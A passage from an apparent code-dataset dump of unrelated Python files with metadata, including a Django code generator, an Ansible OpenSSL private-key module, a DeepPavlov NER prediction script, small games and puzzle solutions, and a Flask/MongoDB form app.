os.linesep\n\tretval = retval + '''\\\nfrom django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n'''\n\tretval = retval + '''\\\n\turl(r\\'^$\\', views.home, name=\\'home\\'),\n'''\n\tfor iter in lstclassnames:\n\t\tretval = retval + 'url(r\\'^{0}/edit$\\', views.{0}_edit, name=\\'{0}_edit\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/edit/(?P\\d+)$\\', views.{0}_edit, name=\\'{0}_edit\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/index$\\', views.{0}_list, name=\\'{0}_list\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/delete$\\', views.{0}_remove, name=\\'{0}_remove\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/save$\\', views.{0}_save, name=\\'{0}_save\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + 'url(r\\'^{0}/save/(?P\\d+)$\\', views.{0}_save, name=\\'{0}_save\\'),'.format(iter.lower()) + os.linesep\n\t\tretval = retval + os.linesep\n\tretval = retval + ')'\n\treturn retval\n\ndef make_admin_file(lstclassnames):\n\tretval = '''\\\nfrom django.contrib import admin\nfrom {0}.models import {1}\n\nclasses=[{1}]\n\nfor iterclass in classes:\n\tadmin.site.register(iterclass)\\\n'''.format(\n\t\tos.path.dirname(os.path.realpath(__file__)).split(os.sep)[-1], #should we use os.getcwd instead of dirname of realpath?\n\t\t', '.join(lstclassnames)\n\t)\n\treturn retval\n\nimport re\n\n#matchobj = re.search(r'pat', 'str')\n#print(matchobj.group(0))\n\n#match looks only at the beginning of the string\n#search is a proper search\n\ndef writetofile(filename, content):\n\tf=open(filename, 'w')\n\tf.write(content)\n\tf.close()\n\ndef generate_code(modelsfile='models.py', viewsfile=None, urlsfile=None, adminfile=None, formsfile=None):\n\tcre = re.compile(r'class +(.*) *'+re.escape('('))\n\tmodelsfile = open(modelsfile, 'r')\n\tlstclassnames = []\n\tfor line in modelsfile:\n\t\tcap = cre.match(line)\n\t\tif not cap is None:\n\t\t\tclassname = cap.group(1)\n\t\t\tif not classname.endswith('Base'): #ignore base classes\n\t\t\t\tlstclassnames.append(classname)\n\tif len(lstclassnames)>0:\n\t\tif not urlsfile is None:\n\t\t\twritetofile(urlsfile, make_urls_file(lstclassnames))\n\t\tif not viewsfile is None:\n\t\t\twritetofile(viewsfile, make_views_file(lstclassnames))\n\t\tif not adminfile is None:\n\t\t\twritetofile(adminfile, make_admin_file(lstclassnames))\n\t\tif not formsfile is None:\n\t\t\twritetofile(formsfile, make_forms_file(lstclassnames))\n\t\twrite_template_files(lstclassnames)\n\t\tpass\n\tmodelsfile.close()\n\nif __name__=='__main__':\n\tgenerate_code('models.py', 'views.py', 'urls.py', 'admin.py', 'forms.py')","sub_path":"srcgen.py","file_name":"srcgen.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428035244","text":"from django.urls import path\nfrom rest_framework import routers\n\nfrom users import views\n\nurlpatterns = [\n path('signup/', views.signup, name='signup'),\n path('login/', views.login, name='login')\n]\n\nrouter = routers.DefaultRouter()\nrouter.register(r'profiles', views.ProfileViewSet, base_name='auth')\n\nurlpatterns += router.urls\n","sub_path":"my_food/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"473252286","text":"\"\"\"\nДороги Нью-Манхэттена устроены следующим образом. С юга на север через каждые сто метров проходит авеню,\nс запада на восток через каждые сто метров проходит улица. Авеню и улицы нумеруются целыми числами.\nМеньшие номера соответствуют западным авеню и южным улицам. Таким образом, можно построить\nпрямоугольную систему координат так, чтобы точка (x, y) лежала на пересечении x-ой авеню и y-ой улицы.\nЛегко заметить, что для того, чтобы в Нью-Манхэттене дойти от точки (x1, y1) до точки (x2, y2) нужно пройти\n |x2 − x1| + |y2 − y1| кварталов. Эта величина называется манхэттенским расстоянием между точками (x1, y1) и (x2, y2).\n\nМиша живет в Нью-Манхэттене и каждое утро делает пробежку по городу. Он выбегает из своего дома,\nкоторый находится в точке (0, 0) и бежит по случайному маршруту.\nКаждую минуту Миша либо остается на том же перекрестке, что и минуту назад, или перемещается на один квартал\nв любом направлении. Чтобы не заблудиться Миша берет с собой навигатор, который каждые t минут говорит Мише,\nв какой точке он находится. К сожалению, навигатор показывает не точное положение Миши, он может показать любую из точек,\nманхэттенское расстояние от которых до Миши не превышает d.\n\nЧерез t × n минут от начала пробежки, получив n-е сообщение от навигатора, Миша решил, что пора бежать домой.\nДля этого он хочет понять, в каких точках он может находиться. Помогите Мише сделать это.\n\n---\nФормат ввода\nПервая строка входного файла содержит числа t, d и n (1 ≤ t ≤ 100, 1 ≤ d ≤ 100, 1 ≤ n ≤ 100).\nДалее n строк описывают данные, полученные от навигатора. Строка номер i содержит числа x_i и y_i — данные, полученные\nот навигатора через t_i минут от начала пробежки.\n\nФормат вывода\nВ первой строке выходного файла выведите число m — число точек, в которых может находиться Миша.\nДалее выведите m пар чисел — координаты точек. Точки можно вывести в произвольном порядке.\nГарантируется, что навигатор исправен и что существует по крайней мере одна точка, в которой может находиться Миша.\n\"\"\"\n\n# NON-OPTIMAL SOLUTION\n# Less resource and time demanding algorithm would use 4 linear equations to depict area of permitted values.\nt, d, n = map(int, input().split())\n\ncoords = []\nfor _ in range(n):\n coords.append(tuple(map(int, input().split())))\n\nsteps = t*n # макс сумма расстояний по координате\n\nall_ends = set()\nfor x in range(0, steps+1):\n for y in range(steps-x, -steps+x-1, -1):\n all_ends.add((x, y))\nfor x in range(-1, -steps-1, -1):\n for y in range(steps+x, -steps-x-1, -1):\n all_ends.add((x, y))\n\n# initial_diamond = set() #cоздадим ромб в начале координат\n# initial_diamond.add((0, 0))\n# for x in range(0, t+1):\n# for y in range(t-x, -t+x-1, -1):\n# initial_diamond.add((x, y))\n# for x in range(-1, -t-1, -1):\n# for y in range(t+x, -t-x-1, -1):\n# initial_diamond.add((x, y))\n\nnew_ends = set()\nfx, fy = coords[0]\nfor x in range(0, d+1):\n for y in range(d-x, -d+x-1, -1):\n new_ends.add((x+fx, y+fy))\nfor x in range(-1, -d-1, -1):\n for y in range(d+x, -d-x-1, -1):\n new_ends.add((x+fx, y+fy))\nnew_ends = new_ends.intersection(all_ends)\n\nfor fx, fy in coords[1:]:\n old_ends = new_ends.copy()\n for xx, yy in old_ends: # увеличиим ромб на t в каждую сторону\n for x in range(0, t+1):\n for y in range(t-x, -t+x-1, -1):\n new_ends.add((x+xx, y+yy))\n for x in range(-1, -t-1, -1):\n for y in range(t+x, -t-x-1, -1):\n new_ends.add((x+xx, y+yy))\n\n new_diamond = set() # область возможных значений после того, как стала известна координата\n for x in range(0, d+1):\n for y in range(d-x, -d+x-1, -1):\n new_diamond.add((x+fx, y+fy))\n for x in range(-1, -d-1, -1):\n for y in range(d+x, -d-x-1, -1):\n new_diamond.add((x+fx, y+fy))\n\n new_ends= new_ends.intersection(new_diamond)\n\nfin = all_ends.intersection(new_ends)\nprint(len(fin))\nfor kek in fin:\n print(\" \".join(map(str, kek)))\n","sub_path":"03_Sets/10_Manhattan_Nav.py","file_name":"10_Manhattan_Nav.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"599084269","text":"import random\r\n\r\ndef game(comp, you):\r\n if (comp == you):\r\n return None\r\n elif (comp == 's'):\r\n if (you == 'w'):\r\n return False\r\n elif (you == 'g'):\r\n return True\r\n elif (comp == 'w'):\r\n if (you == 's'):\r\n return True\r\n elif (you == 'g'):\r\n return False\r\n elif (comp == 'g'):\r\n if (you == 's'):\r\n return False\r\n elif (you == 'w'):\r\n return True\r\n\r\n\r\nprint ('Computer Turn: Snake(s) or Water(w) or Gun(g)? ')\r\n\r\nrand = random.randint(1, 3)\r\nif (rand == 1):\r\n comp = 's'\r\nelif (rand == 2):\r\n comp = 'w'\r\nelif (rand == 3):\r\n comp = 'g'\r\n\r\nyou = input('Player 2 Turn: Snake(s) or Water(w) or Gun(g)? ')\r\na = game(comp, you)\r\n\r\nprint (f'Computer choose {comp}')\r\nprint (f'You choose {you}')\r\n\r\nif (a == None):\r\n print ('The game is a tie!')\r\nelif(a):\r\n print ('You Win!')\r\nelse:\r\n print ('You Lose!')\r\n","sub_path":"68_Snake_water_gun_game.py","file_name":"68_Snake_water_gun_game.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"130075363","text":"import inspect\nimport numbers\n\nimport numpy as np\nimport scipy.odr as odr\nimport scipy.optimize as opt\nfrom pycertainties import Val\n\n\ndef rows_to_list(string_data):\n return [row.split() for row in string_data.strip().split(\"\\n\")]\n\n\ndef rows_to_numpy(string_data, sep=\",\"):\n if sep:\n data = [row.split(sep) for row in string_data.strip().split(\"\\n\")]\n else:\n data = [row.split() for row in string_data.strip().split(\"\\n\")]\n return np.array(data, np.float64)\n\n\ndef cols_to_numpy(string_data, sep=None):\n return rows_to_numpy(string_data, sep).transpose()\n\n\ndef pprint_matrix(matrix, column_lables=None, *, title=None, sep=\"|\", width=20, fwidth=10):\n \"\"\"\n A pretty printer for 2d arrays\n\n matrix: The 2d array\n column_labels: Labels for the columns while printing\n \"\"\"\n if len(matrix.shape) != 2:\n raise ValueError\n\n rows, cols = matrix.shape\n if title:\n spaces = width + (width + 1) * (cols - 1)\n title_string = f\"{{:^{spaces}}}\"\n print(title_string.format(title))\n if column_lables:\n string = sep.join([f\"{{:^{width}}}\"] * cols)\n print(string.format(*column_lables))\n for row in range(rows):\n\n def fmt_str(val):\n return (\n f\"{{:^{width}.{fwidth}g}}\"\n if isinstance(val, numbers.Real) and not isinstance(val, int)\n else f\"{{:^{width}}}\"\n )\n\n strings = [fmt_str(val) for val in matrix[row]]\n string = sep.join(strings)\n print(string.format(*matrix[row]))\n\n\ndef _remove_zeros(xs, ys, dxs, dys):\n def filtered(values):\n if values is None:\n return values\n return [\n val for ind, val in enumerate(values) if (dxs is None or dxs[ind] != 0) and (dys is None or dys[ind] != 0)\n ]\n\n return filtered(xs), filtered(ys), filtered(dxs), filtered(dys)\n\n\ndef _fit_func(func, xs, ys, dxs=None, dys=None, guesses=None):\n if dxs is None:\n optimal, covarience = opt.curve_fit(func, xs, ys, sigma=dys, p0=guesses, maxfev=3000)\n else:\n xs, ys, dxs, dys = _remove_zeros(xs, ys, dxs, dys)\n data = odr.RealData(xs, ys, dxs, dys)\n new_func = lambda beta, x: func(x, *beta)\n sig = inspect.signature(func)\n options = len(sig.parameters) - 1\n model = odr.Model(new_func)\n odr_obj = odr.ODR(data, model, beta0=[1 for _ in range(options)] if guesses is None else guesses)\n res = odr_obj.run()\n optimal, covarience = res.beta, res.cov_beta\n\n stddev = np.sqrt(np.diag(covarience))\n return tuple(Val(value, uncertainty) for value, uncertainty in zip(optimal, stddev))\n\n\ndef fit_func(func, xs, ys, dxs=None, dys=None, limits=None, guesses=None):\n if limits is not None:\n trim = lambda values: values[limits] if values is not None else None\n values = [trim(values) for values in (xs, ys, dxs, dys)]\n else:\n values = (xs, ys, dxs, dys)\n return _fit_func(func, *values, guesses=guesses)\n\n\ndef r_squared(func, xs, ys, parameters):\n residuals = ys - func(xs, *parameters)\n residual_sum_of_squares = np.sum(residuals ** 2)\n total_sum_of_squares = np.sum((ys - np.mean(ys)) ** 2)\n return 1 - (residual_sum_of_squares / total_sum_of_squares)\n","sub_path":"venv/Lib/site-packages/matplotobjlib/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"420739134","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2016, Yanis Guenane \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: openssl_privatekey\nshort_description: Generate OpenSSL private keys\ndescription:\n - This module allows one to (re)generate OpenSSL private keys.\nauthor:\n - Yanis Guenane (@Spredzy)\n - Felix Fontein (@felixfontein)\noptions:\n state:\n description:\n - Whether the private key should exist or not, taking action if the state is different from what is stated.\n type: str\n default: present\n choices: [ absent, present ]\n force:\n description:\n - Should the key be regenerated even if it already exists.\n type: bool\n default: no\n path:\n description:\n - Name of the file in which the generated TLS/SSL private key will be written. It will have C(0600) mode\n if I(mode) is not explicitly set.\n type: path\n required: true\n format:\n version_added: '1.0.0'\n format_mismatch:\n version_added: '1.0.0'\n backup:\n description:\n - Create a backup file including a timestamp so you can get\n the original private key back if you overwrote it with a new one by accident.\n type: bool\n default: no\n return_content:\n description:\n - If set to C(yes), will return the (current or generated) private key's content as I(privatekey).\n - Note that especially if the private key is not encrypted, you have to make sure that the returned\n value is treated appropriately and not accidentally written to logs etc.! Use with care!\n - Use Ansible's I(no_log) task option to avoid the output being shown. See also\n U(https://docs.ansible.com/ansible/latest/reference_appendices/faq.html#how-do-i-keep-secret-data-in-my-playbook).\n type: bool\n default: no\n version_added: '1.0.0'\n regenerate:\n version_added: '1.0.0'\nextends_documentation_fragment:\n- ansible.builtin.files\n- community.crypto.module_privatekey\nseealso:\n- module: community.crypto.openssl_privatekey_pipe\n- module: community.crypto.openssl_privatekey_info\n'''\n\nEXAMPLES = r'''\n- name: Generate an OpenSSL private key with the default values (4096 bits, RSA)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n\n- name: Generate an OpenSSL private key with the default values (4096 bits, RSA) and a passphrase\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n passphrase: ansible\n cipher: aes256\n\n- name: Generate an OpenSSL private key with a different size (2048 bits)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n size: 2048\n\n- name: Force regenerate an OpenSSL private key if it already exists\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n force: yes\n\n- name: Generate an OpenSSL private key with a different algorithm (DSA)\n community.crypto.openssl_privatekey:\n path: /etc/ssl/private/ansible.com.pem\n type: DSA\n'''\n\nRETURN = r'''\nsize:\n description: Size (in bits) of the TLS/SSL private key.\n returned: changed or success\n type: int\n sample: 4096\ntype:\n description: Algorithm used to generate the TLS/SSL private key.\n returned: changed or success\n type: str\n sample: RSA\ncurve:\n description: Elliptic curve used to generate the TLS/SSL private key.\n returned: changed or success, and I(type) is C(ECC)\n type: str\n sample: secp256r1\nfilename:\n description: Path to the generated TLS/SSL private key file.\n returned: changed or success\n type: str\n sample: /etc/ssl/private/ansible.com.pem\nfingerprint:\n description:\n - The fingerprint of the public key. Fingerprint will be generated for each C(hashlib.algorithms) available.\n - The PyOpenSSL backend requires PyOpenSSL >= 16.0 for meaningful output.\n returned: changed or success\n type: dict\n sample:\n md5: \"84:75:71:72:8d:04:b5:6c:4d:37:6d:66:83:f5:4c:29\"\n sha1: \"51:cc:7c:68:5d:eb:41:43:88:7e:1a:ae:c7:f8:24:72:ee:71:f6:10\"\n sha224: \"b1:19:a6:6c:14:ac:33:1d:ed:18:50:d3:06:5c:b2:32:91:f1:f1:52:8c:cb:d5:75:e9:f5:9b:46\"\n sha256: \"41:ab:c7:cb:d5:5f:30:60:46:99:ac:d4:00:70:cf:a1:76:4f:24:5d:10:24:57:5d:51:6e:09:97:df:2f:de:c7\"\n sha384: \"85:39:50:4e:de:d9:19:33:40:70:ae:10:ab:59:24:19:51:c3:a2:e4:0b:1c:b1:6e:dd:b3:0c:d9:9e:6a:46:af:da:18:f8:ef:ae:2e:c0:9a:75:2c:9b:b3:0f:3a:5f:3d\"\n sha512: \"fd:ed:5e:39:48:5f:9f:fe:7f:25:06:3f:79:08:cd:ee:a5:e7:b3:3d:13:82:87:1f:84:e1:f5:c7:28:77:53:94:86:56:38:69:f0:d9:35:22:01:1e:a6:60:...:0f:9b\"\nbackup_file:\n description: Name of backup file created.\n returned: changed and if I(backup) is C(yes)\n type: str\n sample: /path/to/privatekey.pem.2019-03-09@11:22~\nprivatekey:\n description:\n - The (current or generated) private key's content.\n - Will be Base64-encoded if the key is in raw format.\n returned: if I(state) is C(present) and I(return_content) is C(yes)\n type: str\n version_added: '1.0.0'\n'''\n\nimport os\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\n\nfrom ansible_collections.community.crypto.plugins.module_utils.io import (\n load_file_if_exists,\n write_file,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.basic import (\n OpenSSLObjectError,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.support import (\n OpenSSLObject,\n)\n\nfrom ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.privatekey import (\n select_backend,\n get_privatekey_argument_spec,\n)\n\n\nclass PrivateKeyModule(OpenSSLObject):\n\n def __init__(self, module, module_backend):\n super(PrivateKeyModule, self).__init__(\n module.params['path'],\n module.params['state'],\n module.params['force'],\n module.check_mode,\n )\n self.module_backend = module_backend\n self.return_content = module.params['return_content']\n if self.force:\n module_backend.regenerate = 'always'\n\n self.backup = module.params['backup']\n self.backup_file = None\n\n if module.params['mode'] is None:\n module.params['mode'] = '0600'\n\n module_backend.set_existing(load_file_if_exists(self.path, module))\n\n def generate(self, module):\n \"\"\"Generate a keypair.\"\"\"\n\n if self.module_backend.needs_regeneration():\n # Regenerate\n if not self.check_mode:\n if self.backup:\n self.backup_file = module.backup_local(self.path)\n self.module_backend.generate_private_key()\n privatekey_data = self.module_backend.get_private_key_data()\n if self.return_content:\n self.privatekey_bytes = privatekey_data\n write_file(module, privatekey_data, 0o600)\n self.changed = True\n elif self.module_backend.needs_conversion():\n # Convert\n if not self.check_mode:\n if self.backup:\n self.backup_file = module.backup_local(self.path)\n self.module_backend.convert_private_key()\n privatekey_data = self.module_backend.get_private_key_data()\n if self.return_content:\n self.privatekey_bytes = privatekey_data\n write_file(module, privatekey_data, 0o600)\n self.changed = True\n\n file_args = module.load_file_common_arguments(module.params)\n self.changed = module.set_fs_attributes_if_different(file_args, self.changed)\n\n def remove(self, module):\n self.module_backend.set_existing(None)\n if self.backup and not self.check_mode:\n self.backup_file = module.backup_local(self.path)\n super(PrivateKeyModule, self).remove(module)\n\n def dump(self):\n \"\"\"Serialize the object into a dictionary.\"\"\"\n\n result = self.module_backend.dump(include_key=self.return_content)\n result['filename'] = self.path\n result['changed'] = self.changed\n if self.backup_file:\n result['backup_file'] = self.backup_file\n\n return result\n\n\ndef main():\n\n argument_spec = get_privatekey_argument_spec()\n argument_spec.argument_spec.update(dict(\n state=dict(type='str', default='present', choices=['present', 'absent']),\n force=dict(type='bool', default=False),\n path=dict(type='path', required=True),\n backup=dict(type='bool', default=False),\n return_content=dict(type='bool', default=False),\n ))\n module = argument_spec.create_ansible_module(\n supports_check_mode=True,\n add_file_common_args=True,\n )\n\n base_dir = os.path.dirname(module.params['path']) or '.'\n if not os.path.isdir(base_dir):\n module.fail_json(\n name=base_dir,\n msg='The directory %s does not exist or the file is not a directory' % base_dir\n )\n\n backend, module_backend = select_backend(\n module=module,\n backend=module.params['select_crypto_backend'],\n )\n\n try:\n private_key = PrivateKeyModule(module, module_backend)\n\n if private_key.state == 'present':\n private_key.generate(module)\n else:\n private_key.remove(module)\n\n result = private_key.dump()\n module.exit_json(**result)\n except OpenSSLObjectError as exc:\n module.fail_json(msg=to_native(exc))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/modules/openssl_privatekey.py","file_name":"openssl_privatekey.py","file_ext":"py","file_size_in_byte":9865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"229173320","text":"\"\"\"\nSchema's common stuff\n\"\"\"\nimport sys\n\nif sys.version_info < (3, 6):\n from aiohttp_json_api.compat.enum import Enum, Flag, auto\nelse:\n from enum import Enum, Flag, auto\n\n\nclass Step(Enum):\n BEFORE_DESERIALIZATION = auto()\n AFTER_DESERIALIZATION = auto()\n BEFORE_SERIALIZATION = auto()\n AFTER_SERIALIZATION = auto()\n\n\nclass Event(Flag):\n GET = auto()\n POST = auto()\n PATCH = auto()\n DELETE = auto()\n NEVER = auto()\n ALWAYS = GET | POST | PATCH | DELETE\n CREATE = POST\n UPDATE = PATCH\n","sub_path":"aiohttp_json_api/schema/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"325463015","text":"# -*- coding:utf-8 -*-\n\nfrom app import db\nfrom app.models.message import Message, MessageMiddle\nimport datetime\n\n\ndef message(content, cat, nicks):\n m = Message(content=content, cat=cat, time=datetime.datetime.now())\n m.save()\n\n for nick in nicks.split(',')[:-1]:\n if nick:\n data = dict(message_id=m.id, nick=nick, cat=cat,)\n db.session.add(MessageMiddle(**data))\n db.session.commit()\n","sub_path":"app/tools/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"309255276","text":"import argparse, os\nfrom deeppavlov import build_model, configs\nfrom converters import tokenize, tokenize_tagged, NO_ENTITY_MARK\nfrom nltk.tokenize import RegexpTokenizer\nfrom file_operations import write_lines\n\nTAGGED_MARK = 'tagged'\n\nPREDICTED_TAG_BODIES_MAPPING = {'LOC': 'Location', 'ORG': 'Org', 'PER': 'Person', 'O': 'O', 'PERSON': 'Person', \n 'GPE': 'Org', 'NORP': 'Location', 'WORK_OF_ART': 'Org'}\nDEFAULT_TAG_BODY = 'Other'\n\nMODEL_IDS = {\n 'slavic': 'slavic',\n 'ontonotes_bert': 'ner_ontonotes_bert',\n 'ontonotes_mult': 'ner_ontonotes_bert_mult',\n 'rus_bert': 'ner_rus_bert',\n 'rus': 'ner_rus',\n 'few_shot_simulate': 'ner_few_shot_ru_simulate',\n 'ontonotes': 'ner_ontonotes',\n 'few_shot': 'ner_few_shot_ru',\n 'kb_rus': 'ner_kb_rus'\n}\n\nMODEL_CONFIGS = {\n 'slavic': './ner_bert_slav.json',\n 'ontonotes_bert': configs.ner.ner_ontonotes_bert,\n 'ontonotes_mult': configs.ner.ner_ontonotes_bert_mult,\n 'rus_bert': configs.ner.ner_rus_bert,\n 'rus': configs.ner.ner_rus,\n 'few_shot_simulate': configs.ner.ner_few_shot_ru_simulate,\n 'ontonotes': configs.ner.ner_ontonotes,\n 'few_shot': configs.ner.ner_few_shot_ru,\n 'kb_rus': configs.ner.ner_kb_rus\n}\n\ndef get_key(dictionary, required_value):\n for key, value in dictionary.items(): # for name, age in dictionary.iteritems(): (for Python 2.x)\n if value == required_value:\n return key\n\ndef write_prediction_results(labels, tokens, output_file):\n lines = []\n for sentence_tokens, sentence_labels in zip(tokens, labels):\n for token, label in zip(sentence_tokens, sentence_labels):\n if len(label.split(\"-\")) < 2:\n lines.append(f'{token} {NO_ENTITY_MARK}')\n else:\n tag_prefix, tag_body = label.split(\"-\")\n tag_body = PREDICTED_TAG_BODIES_MAPPING.get(tag_body, DEFAULT_TAG_BODY)\n lines.append(f'{token} {tag_prefix}-{tag_body}')\n #lines.append(f'{token} {label}')\n #lines.append(f'{token} {label.split(\"-\")[-1].capitalize()}')\n lines.append('')\n write_lines(output_file, lines)\n\ndef extract_predictions(sentence):\n return list(map(lambda one_item_list: one_item_list[0], sentence[1]))\n\ndef _predict(config_id, tokens, output_file):\n # Download and load model (set download=False to skip download phase)\n print(f'Config: {MODEL_CONFIGS[config_id]}')\n ner = build_model(MODEL_CONFIGS[config_id], download = True)\n\n # if args.model == MODEL_IDS['slavic']:\n # ner = build_model(\"./ner_bert_slav.json\", download=True)\n # elif args.model == MODEL_IDS['rus']:\n # ner = build_model(configs.ner.ner_rus_bert, download=True)\n\n entities = list(map(lambda sentence: extract_predictions(ner(sentence)), tokens))\n\n write_prediction_results(entities, tokens, output_file)\n\nif __name__ == \"__main__\":\n tokenizer = RegexpTokenizer('\\w+|\\$[\\d\\.]+|\\S+')\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--input_file', type=str, default='raw.txt')\n parser.add_argument('--output_file', type=str, default='raw.predictions.txt')\n parser.add_argument('--model', type=str, default=MODEL_IDS['slavic'], choices=list(MODEL_IDS.values()))\n parser.add_argument('--run_all', type=bool, default=False)\n parser.add_argument('--tagged', action='store_true')\n\n args = parser.parse_args()\n\n tokens = tokenize(args.input_file, tokenizer) if not args.tagged and not TAGGED_MARK in args.input_file.split('/')[-1].split('.') else tokenize_tagged(args.input_file)\n\n if not args.run_all:\n # # Download and load model (set download=False to skip download phase)\n # ner = build_model(MODEL_CONFIGS[get_key(MODEL_IDS, args.model)])\n # # if args.model == MODEL_IDS['slavic']:\n # # ner = build_model(\"./ner_bert_slav.json\", download=True)\n # # elif args.model == MODEL_IDS['rus']:\n # # ner = build_model(configs.ner.ner_rus_bert, download=True)\n\n # entities = list(map(lambda sentence: extract_predictions(ner(sentence)), tokens))\n\n # write_prediction_results(entities, tokens, args.output_file)\n _predict(get_key(MODEL_IDS, args.model), tokens, args.output_file)\n else:\n for config in MODEL_CONFIGS:\n #print(config)\n _predict(config, tokens, f'eval.tagged.{config}.txt')\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"613592376","text":"from flask import Flask, request, json, Response, render_template, flash, redirect, jsonify, url_for\nfrom pymongo import errors, MongoClient\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField\nfrom wtforms.validators import DataRequired, ValidationError\n\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nfrom flask_table import Table, Col, LinkCol\n\nimport logging\nimport file_handler\nimport yaml, pathlib\nfrom IPy import IP\n\nLOG = logging.getLogger(__name__)\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'ezpz'\n\nENV_FILE = pathlib.Path(\"/usr/share/flask/file_web_db.yml\")\n\nwith open(ENV_FILE, \"r\") as yaml_data:\n ENV_DATA = yaml.load(yaml_data, Loader=yaml.FullLoader)\n HOST_IP = str(ENV_DATA['HOST_IP'])\n\nnav = [\n {'name': 'Home', 'url': f'http://{HOST_IP}:5000/home'},\n {'name': 'Upload/Delete', 'url': f'http://{HOST_IP}:5000/upload'},\n {'name': 'Search', 'url': f'http://{HOST_IP}:5000/search'},\n]\n\nclass Results(Table):\n id = Col('BranchId', show=False)\n edit = LinkCol(\n name='Edit',\n endpoint='update',\n url_kwargs=dict(id='routerName'),\n )\n Delete = LinkCol(\n name='Delete',\n endpoint='delete',\n url_kwargs=dict(id='routerName'),\n )\n routerName = Col('routerName')\n customer_pciAddress = Col('customer_pciAddress')\n customer_tenant = Col('customer_tenant')\n dns_servers = Col('dns_servers')\n entitlement_end_date = Col('entitlement_end_date')\n entitlement_mbs = Col('entitlement_mbs')\n interNodeSecurity = Col('interNodeSecurity')\n interRouterSecurity = Col('interRouterSecurity')\n location = Col('location')\n locationCoordinates = Col('locationCoordinates')\n management_loopback = Col('management_loopback')\n management_service_security = Col('management_service_security')\n management_tenant = Col('management_tenant')\n neighborhood_name = Col('neighborhood_name')\n ntp_servers = Col('ntp_servers')\n provider_gateway = Col('provider_gateway')\n provider_ipAddress = Col('provider_ipAddress')\n provider_pciAddress = Col('provider_pciAddress')\n provider_prefixLength = Col('provider_prefixLength')\n provider_tenant = Col('provider_tenant')\n\n\nclass SearchForm(FlaskForm):\n search = StringField('Branch ID')\n submit = SubmitField('search')\n\n\nclass DataForm(FlaskForm):\n \"\"\"\n From for DB entry\n \"\"\"\n # storeNumber = StringField('storeNumber', validators=[DataRequired()])\n # storeId = StringField('storeId', validators=[DataRequired()])\n # name = StringField('name', validators=[DataRequired()])\n # location = StringField('location', validators=[DataRequired()])\n # data = { \"storeNumber\": storeNumber, \"name\": name, \"storeId\": storeId, \"location\": location }\n # submit = SubmitField('Upload Data')\n\n\n routerName = StringField('routerName', validators=[DataRequired()])\n customer_pciAddress = StringField('customer_pciAddress', validators=[DataRequired()])\n customer_tenant = StringField('customer_tenant', validators=[DataRequired()])\n dns_servers = StringField('dns_servers', validators=[DataRequired()])\n entitlement_end_date = StringField('entitlement_end_date', validators=[DataRequired()])\n entitlement_mbs = StringField('entitlement_mbs', validators=[DataRequired()])\n interNodeSecurity = StringField('interNodeSecurity', validators=[DataRequired()])\n interRouterSecurity = StringField('interRouterSecurity', validators=[DataRequired()])\n location = StringField('location', validators=[DataRequired()])\n locationCoordinates = StringField('locationCoordinates', validators=[DataRequired()])\n management_loopback = StringField('management_loopback', validators=[DataRequired()])\n management_service_security = StringField('management_service_security', validators=[DataRequired()])\n management_tenant = StringField('management_tenant', validators=[DataRequired()])\n neighborhood_name = StringField('neighborhood_name', validators=[DataRequired()])\n ntp_servers = StringField('ntp_servers', validators=[DataRequired()])\n provider_gateway = StringField('provider_gateway', validators=[DataRequired()])\n provider_ipAddress = StringField('provider_ipAddress', validators=[DataRequired()])\n provider_pciAddress = StringField('provider_pciAddress', validators=[DataRequired()])\n provider_prefixLength = StringField('provider_prefixLength', validators=[DataRequired()])\n provider_tenant = StringField('provider_tenant', 